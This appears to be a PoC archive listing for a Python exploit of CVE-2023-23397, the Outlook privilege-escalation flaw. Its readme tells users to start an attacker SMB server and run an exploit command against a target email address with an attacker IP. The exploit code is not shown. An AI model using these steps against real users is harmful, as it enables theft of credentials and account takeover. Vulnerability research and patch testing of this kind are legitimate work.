Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-23397 PoC — Microsoft Outlook Elevation of Privilege Vulnerability

Source
Associated Vulnerability
Title:Microsoft Outlook Elevation of Privilege Vulnerability (CVE-2023-23397)
Description:Microsoft Outlook Elevation of Privilege Vulnerability
Description
Proof of Concept for CVE-2023-23397 in Python
Readme
# CVE-2023-23397 (Outlook Privilege Escalation)
Proof of Concept for CVE-2023-23397 in Python

Quick and easy "proof of concept" in Python for the Outlook CVE that affects Microsoft Office/365 products. 

# Usage
1. Install pywin by running `pip install pywin32`
2. Start a SMB server on the attacker machine, such as Metasploit's SMB module
3. Run `python Exploit.py <save_or_send> <target email> <attacker_ip>` passing the command (save or send), the target email address and the IP of the attacker's machine
File Snapshot

[4.0K] /data/pocs/feee30111353c57631696ee3be8d52df7931a8dc ├── [2.3K] Exploit.py ├── [ 34K] LICENSE └── [ 511] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →